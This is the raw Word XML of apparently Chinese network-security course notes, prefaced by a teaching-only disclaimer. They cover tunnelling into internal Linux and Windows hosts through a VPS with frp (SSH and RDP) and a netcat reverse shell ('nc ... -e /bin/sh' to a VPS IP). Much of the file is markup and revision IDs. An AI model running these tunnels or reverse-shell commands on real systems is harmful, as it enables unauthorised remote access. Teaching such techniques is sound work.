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免责声明： </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/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本课程内容仅限于网络安全教学，不得用于其他用途。任何利用本课程内容从事违法犯罪活动的行为，都严重违背了该课程设计的初衷，且属于使用者的个人行为与讲师无关，讲师不为此承担任何法律责任。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/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希望同学们知法、懂法、守法，做一个良好公民。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/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内网穿透</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Frps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linux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53150" cy="3390265"/>
            <wp:effectExtent l="0" t="0" r="3810" b="8255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将frps文件上传到云端，配置端口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vim frps.ini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00115" cy="2945130"/>
            <wp:effectExtent l="0" t="0" r="4445" b="11430"/>
            <wp:docPr id="4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./frps -c ./frps.ini（启动后接配置文件）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95035" cy="880110"/>
            <wp:effectExtent l="0" t="0" r="9525" b="3810"/>
            <wp:docPr id="3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在lniux启动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客户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端编辑配置文件frpc.ini，配服务器的地址和端口（服务器要开启9999，6000）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5990" cy="3756025"/>
            <wp:effectExtent l="0" t="0" r="3810" b="8255"/>
            <wp:docPr id="3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允许远程登陆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48150" cy="2038350"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="3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启动远程登陆服务，启动本地frps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./frp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-c ./frp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.ini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72200" cy="1560830"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="3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另一台电脑连接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ssh -oPort=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="393939"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>6000 root@101.43.85.135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2675" cy="3686175"/>
            <wp:effectExtent l="0" t="0" r="9525" b="1905"/>
            <wp:docPr id="4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密码是连接的kali的密码123456不是服务器密码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（2）windows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Windows（注意版本，rdp，3389）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88710" cy="2611755"/>
            <wp:effectExtent l="0" t="0" r="13970" b="9525"/>
            <wp:docPr id="3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利用powershell启动服务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690" cy="1720850"/>
            <wp:effectExtent l="0" t="0" r="6350" b="127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frp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c.exe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-c .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frp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.ini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8875" cy="1236980"/>
            <wp:effectExtent l="0" t="0" r="9525" b="12700"/>
            <wp:docPr id="3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攻击机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远程桌面连接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攻击机为windows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91225" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="13335" b="9525"/>
            <wp:docPr id="3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攻击机为Linux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rdesktop 119.3.158.99:6000    #远程桌面连接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2585085"/>
            <wp:effectExtent l="0" t="0" r="14605" b="5715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1854835"/>
            <wp:effectExtent l="0" t="0" r="14605" b="444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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>c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yum -y install nc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#安装nc命令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nc -lvvp 9999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#vps监听9999端口（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vps对应端口要开启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53785" cy="1981200"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="4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 descr="IMG_2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目标机反弹shell到vps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nc 119.3.158.99 9999 -e /bin/sh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38600" cy="742950"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="3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 descr="IMG_26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FE355B"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="27FE355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cwMTc3Zjc2ZTUwNjRlMGYyNmQ2YmNkYTdmNDNkY2QifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="46111F03"/>
    <w:rsid w:val="0090210D"/>
    <w:rsid w:val="00927943"/>
    <w:rsid w:val="00BA1A55"/>
    <w:rsid w:val="00E2125F"/>
    <w:rsid w:val="0111602F"/>
    <w:rsid w:val="01A74604"/>
    <w:rsid w:val="01A952B0"/>
    <w:rsid w:val="026A49B8"/>
    <w:rsid w:val="03907D8F"/>
    <w:rsid w:val="03FA2051"/>
    <w:rsid w:val="042744F7"/>
    <w:rsid w:val="05045825"/>
    <w:rsid w:val="056D3840"/>
    <w:rsid w:val="05DB427F"/>
    <w:rsid w:val="06316D8E"/>
    <w:rsid w:val="07061F6C"/>
    <w:rsid w:val="07F7533D"/>
    <w:rsid w:val="082D37EE"/>
    <w:rsid w:val="093F55D8"/>
    <w:rsid w:val="095F264D"/>
    <w:rsid w:val="09820A60"/>
    <w:rsid w:val="09B66248"/>
    <w:rsid w:val="09CB5F78"/>
    <w:rsid w:val="09EF2D45"/>
    <w:rsid w:val="0A2A37A7"/>
    <w:rsid w:val="0A586566"/>
    <w:rsid w:val="0B514ACD"/>
    <w:rsid w:val="0B671110"/>
    <w:rsid w:val="0C6C62F9"/>
    <w:rsid w:val="0C7C12C0"/>
    <w:rsid w:val="0CAE15C5"/>
    <w:rsid w:val="0ECA521F"/>
    <w:rsid w:val="0ED3625B"/>
    <w:rsid w:val="0F1F7C79"/>
    <w:rsid w:val="0F2509E1"/>
    <w:rsid w:val="0F5558E9"/>
    <w:rsid w:val="0FE41EE9"/>
    <w:rsid w:val="105453B4"/>
    <w:rsid w:val="10CD432E"/>
    <w:rsid w:val="114618E1"/>
    <w:rsid w:val="11533A80"/>
    <w:rsid w:val="115C30D3"/>
    <w:rsid w:val="11C40985"/>
    <w:rsid w:val="12611CBC"/>
    <w:rsid w:val="13F228E1"/>
    <w:rsid w:val="1413656F"/>
    <w:rsid w:val="141B23B3"/>
    <w:rsid w:val="14733F09"/>
    <w:rsid w:val="14A879A3"/>
    <w:rsid w:val="14F51BFA"/>
    <w:rsid w:val="15247E6E"/>
    <w:rsid w:val="153F55F3"/>
    <w:rsid w:val="15715932"/>
    <w:rsid w:val="166F3F70"/>
    <w:rsid w:val="16F01FAB"/>
    <w:rsid w:val="170450F8"/>
    <w:rsid w:val="17417C85"/>
    <w:rsid w:val="17824E4F"/>
    <w:rsid w:val="17CA4C65"/>
    <w:rsid w:val="17E31439"/>
    <w:rsid w:val="189B1D78"/>
    <w:rsid w:val="18A74D43"/>
    <w:rsid w:val="194500D2"/>
    <w:rsid w:val="1977008B"/>
    <w:rsid w:val="19E41F02"/>
    <w:rsid w:val="1A172A47"/>
    <w:rsid w:val="1A4C3ECB"/>
    <w:rsid w:val="1AFB73D3"/>
    <w:rsid w:val="1B6E0DBE"/>
    <w:rsid w:val="1BD6688C"/>
    <w:rsid w:val="1D7E39F3"/>
    <w:rsid w:val="1DB33834"/>
    <w:rsid w:val="1DBC60BF"/>
    <w:rsid w:val="1E5435A1"/>
    <w:rsid w:val="1EAB5E29"/>
    <w:rsid w:val="1ED0319D"/>
    <w:rsid w:val="1EE34E6F"/>
    <w:rsid w:val="1F2048D9"/>
    <w:rsid w:val="1F464E53"/>
    <w:rsid w:val="1F9B4D1E"/>
    <w:rsid w:val="1FBD77BC"/>
    <w:rsid w:val="1FC6483F"/>
    <w:rsid w:val="1FE34094"/>
    <w:rsid w:val="200F6117"/>
    <w:rsid w:val="207818F6"/>
    <w:rsid w:val="20FA0E09"/>
    <w:rsid w:val="21495DAE"/>
    <w:rsid w:val="21712EC3"/>
    <w:rsid w:val="21EB5ABA"/>
    <w:rsid w:val="225D61BE"/>
    <w:rsid w:val="227C2F22"/>
    <w:rsid w:val="229D7CA8"/>
    <w:rsid w:val="22E86CA6"/>
    <w:rsid w:val="2304785B"/>
    <w:rsid w:val="23FE163F"/>
    <w:rsid w:val="24865ABF"/>
    <w:rsid w:val="2570067D"/>
    <w:rsid w:val="26714824"/>
    <w:rsid w:val="270E4CE5"/>
    <w:rsid w:val="27287F0E"/>
    <w:rsid w:val="279F56C6"/>
    <w:rsid w:val="289F44B2"/>
    <w:rsid w:val="28A51D9C"/>
    <w:rsid w:val="28EF3CD0"/>
    <w:rsid w:val="2923035D"/>
    <w:rsid w:val="297104FC"/>
    <w:rsid w:val="2A061472"/>
    <w:rsid w:val="2A0F1568"/>
    <w:rsid w:val="2A897C54"/>
    <w:rsid w:val="2B211856"/>
    <w:rsid w:val="2BC62811"/>
    <w:rsid w:val="2C493DE6"/>
    <w:rsid w:val="2CA82583"/>
    <w:rsid w:val="2CAD4D09"/>
    <w:rsid w:val="2CB0718C"/>
    <w:rsid w:val="2CD81BD2"/>
    <w:rsid w:val="2E683F0A"/>
    <w:rsid w:val="2EAE5EA6"/>
    <w:rsid w:val="2EB94C40"/>
    <w:rsid w:val="2EDF34DA"/>
    <w:rsid w:val="2F0D5D93"/>
    <w:rsid w:val="2F4143DD"/>
    <w:rsid w:val="2F4D48EE"/>
    <w:rsid w:val="2F8439C1"/>
    <w:rsid w:val="2FE47EAD"/>
    <w:rsid w:val="30265D63"/>
    <w:rsid w:val="304F36B8"/>
    <w:rsid w:val="306B7AD4"/>
    <w:rsid w:val="313B43E4"/>
    <w:rsid w:val="31D12D88"/>
    <w:rsid w:val="32211A30"/>
    <w:rsid w:val="32EE3975"/>
    <w:rsid w:val="34410D56"/>
    <w:rsid w:val="34750606"/>
    <w:rsid w:val="357E7DA8"/>
    <w:rsid w:val="36033316"/>
    <w:rsid w:val="361327C4"/>
    <w:rsid w:val="368F6DB0"/>
    <w:rsid w:val="36AC7482"/>
    <w:rsid w:val="376D01C0"/>
    <w:rsid w:val="37934472"/>
    <w:rsid w:val="379E05C6"/>
    <w:rsid w:val="37CE5520"/>
    <w:rsid w:val="39675A0F"/>
    <w:rsid w:val="3969336C"/>
    <w:rsid w:val="396A68A4"/>
    <w:rsid w:val="398A7AAA"/>
    <w:rsid w:val="39C2541D"/>
    <w:rsid w:val="39DA4A9C"/>
    <w:rsid w:val="39E500D9"/>
    <w:rsid w:val="3A1351E3"/>
    <w:rsid w:val="3A2E7FE0"/>
    <w:rsid w:val="3A74375B"/>
    <w:rsid w:val="3B0906F0"/>
    <w:rsid w:val="3B217A59"/>
    <w:rsid w:val="3B48020A"/>
    <w:rsid w:val="3B711993"/>
    <w:rsid w:val="3C306E6F"/>
    <w:rsid w:val="3C65728E"/>
    <w:rsid w:val="3DEF7FDD"/>
    <w:rsid w:val="3DFD24EF"/>
    <w:rsid w:val="3E103D4A"/>
    <w:rsid w:val="3EF224EC"/>
    <w:rsid w:val="3F3E115A"/>
    <w:rsid w:val="3F9562E3"/>
    <w:rsid w:val="3FB53538"/>
    <w:rsid w:val="3FDE5624"/>
    <w:rsid w:val="403A5052"/>
    <w:rsid w:val="407C1CB0"/>
    <w:rsid w:val="41A516CD"/>
    <w:rsid w:val="41BB5B1D"/>
    <w:rsid w:val="42C13892"/>
    <w:rsid w:val="42D513F7"/>
    <w:rsid w:val="445D308D"/>
    <w:rsid w:val="44901991"/>
    <w:rsid w:val="44F763A1"/>
    <w:rsid w:val="45017F4D"/>
    <w:rsid w:val="45B1750E"/>
    <w:rsid w:val="45ED15CB"/>
    <w:rsid w:val="45F679AF"/>
    <w:rsid w:val="46111F03"/>
    <w:rsid w:val="4612476D"/>
    <w:rsid w:val="47C8035D"/>
    <w:rsid w:val="48262E71"/>
    <w:rsid w:val="487E06A4"/>
    <w:rsid w:val="48FE4984"/>
    <w:rsid w:val="49FF0BE0"/>
    <w:rsid w:val="4A35566D"/>
    <w:rsid w:val="4A8E58AE"/>
    <w:rsid w:val="4A90723B"/>
    <w:rsid w:val="4AA735E0"/>
    <w:rsid w:val="4B855215"/>
    <w:rsid w:val="4CA52E41"/>
    <w:rsid w:val="4D471EEE"/>
    <w:rsid w:val="4EC6407D"/>
    <w:rsid w:val="505703D6"/>
    <w:rsid w:val="50FD78E9"/>
    <w:rsid w:val="51693400"/>
    <w:rsid w:val="51A83A95"/>
    <w:rsid w:val="51D94ECF"/>
    <w:rsid w:val="52214A37"/>
    <w:rsid w:val="527A39F4"/>
    <w:rsid w:val="528F651D"/>
    <w:rsid w:val="531F3264"/>
    <w:rsid w:val="54B85A50"/>
    <w:rsid w:val="54EF2619"/>
    <w:rsid w:val="55654738"/>
    <w:rsid w:val="55B915A0"/>
    <w:rsid w:val="55F97F96"/>
    <w:rsid w:val="55FE74A7"/>
    <w:rsid w:val="5664772C"/>
    <w:rsid w:val="56AB1696"/>
    <w:rsid w:val="56AC3BE0"/>
    <w:rsid w:val="56BA7D83"/>
    <w:rsid w:val="5765441B"/>
    <w:rsid w:val="57CA16F3"/>
    <w:rsid w:val="592D0D8D"/>
    <w:rsid w:val="597970BD"/>
    <w:rsid w:val="598036BE"/>
    <w:rsid w:val="59980EC4"/>
    <w:rsid w:val="59AC7C7B"/>
    <w:rsid w:val="59C2034F"/>
    <w:rsid w:val="5B845221"/>
    <w:rsid w:val="5C57529F"/>
    <w:rsid w:val="5D432187"/>
    <w:rsid w:val="5D60281A"/>
    <w:rsid w:val="5E2B67B9"/>
    <w:rsid w:val="5E8273CD"/>
    <w:rsid w:val="5E866D7C"/>
    <w:rsid w:val="5E911715"/>
    <w:rsid w:val="5EA55658"/>
    <w:rsid w:val="5EC37CAF"/>
    <w:rsid w:val="5F4955F3"/>
    <w:rsid w:val="5F8A57E4"/>
    <w:rsid w:val="5FB85210"/>
    <w:rsid w:val="5FBF5372"/>
    <w:rsid w:val="61085A61"/>
    <w:rsid w:val="613227E2"/>
    <w:rsid w:val="61560BC3"/>
    <w:rsid w:val="624B3430"/>
    <w:rsid w:val="626157F5"/>
    <w:rsid w:val="62E92EFF"/>
    <w:rsid w:val="630B2492"/>
    <w:rsid w:val="63AF2A41"/>
    <w:rsid w:val="64430863"/>
    <w:rsid w:val="649E3CEB"/>
    <w:rsid w:val="65313520"/>
    <w:rsid w:val="65524B58"/>
    <w:rsid w:val="668B5651"/>
    <w:rsid w:val="66B6356E"/>
    <w:rsid w:val="66C525BA"/>
    <w:rsid w:val="66C53D7C"/>
    <w:rsid w:val="679B0E95"/>
    <w:rsid w:val="67CB5575"/>
    <w:rsid w:val="680A64A2"/>
    <w:rsid w:val="680D5E70"/>
    <w:rsid w:val="68336E40"/>
    <w:rsid w:val="68727B54"/>
    <w:rsid w:val="68A43BBE"/>
    <w:rsid w:val="697677C8"/>
    <w:rsid w:val="6A83516B"/>
    <w:rsid w:val="6A9828DF"/>
    <w:rsid w:val="6AC54EBB"/>
    <w:rsid w:val="6B555D23"/>
    <w:rsid w:val="6C7063C0"/>
    <w:rsid w:val="6C741149"/>
    <w:rsid w:val="6C7B05E2"/>
    <w:rsid w:val="6CC948AD"/>
    <w:rsid w:val="6D3811E3"/>
    <w:rsid w:val="6E4A5A76"/>
    <w:rsid w:val="6E4B4CD1"/>
    <w:rsid w:val="6F897FA9"/>
    <w:rsid w:val="6FA27E14"/>
    <w:rsid w:val="6FBA1CE4"/>
    <w:rsid w:val="70761FC0"/>
    <w:rsid w:val="71AF41EA"/>
    <w:rsid w:val="71FB266A"/>
    <w:rsid w:val="72322B6C"/>
    <w:rsid w:val="723F4D5F"/>
    <w:rsid w:val="72F90BB3"/>
    <w:rsid w:val="735C00ED"/>
    <w:rsid w:val="739569E8"/>
    <w:rsid w:val="747619DF"/>
    <w:rsid w:val="74D21FFC"/>
    <w:rsid w:val="751E2D03"/>
    <w:rsid w:val="75241091"/>
    <w:rsid w:val="7528538D"/>
    <w:rsid w:val="7572238E"/>
    <w:rsid w:val="75821F46"/>
    <w:rsid w:val="75940AE6"/>
    <w:rsid w:val="761248D7"/>
    <w:rsid w:val="762A3062"/>
    <w:rsid w:val="766F457C"/>
    <w:rsid w:val="767E74BC"/>
    <w:rsid w:val="76FD2AFF"/>
    <w:rsid w:val="776808B4"/>
    <w:rsid w:val="77C908EA"/>
    <w:rsid w:val="77FA4CC6"/>
    <w:rsid w:val="79146697"/>
    <w:rsid w:val="79E90D38"/>
    <w:rsid w:val="7A751CE6"/>
    <w:rsid w:val="7AFA6E36"/>
    <w:rsid w:val="7B2A1F4D"/>
    <w:rsid w:val="7B6F139A"/>
    <w:rsid w:val="7B882D90"/>
    <w:rsid w:val="7C1C63DB"/>
    <w:rsid w:val="7C591210"/>
    <w:rsid w:val="7D077B51"/>
    <w:rsid w:val="7D310876"/>
    <w:rsid w:val="7DB52E8C"/>
    <w:rsid w:val="7E981EE2"/>
    <w:rsid w:val="7F090292"/>
    <w:rsid w:val="7F1E02A9"/>
    <w:rsid w:val="7F81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329</Words>
  <Characters>558</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>6</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>583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2022-11-28T09:36:00Z</dcterms:created>
  <dc:creator>踏雪折梅</dc:creator>
  <cp:lastModifiedBy>踏雪折梅</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-03-22T06:11:13Z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20CC5D4EB1844D53B4DE4540B3DA53EF</vt:lpwstr>
  </property>
</Properties>
</file>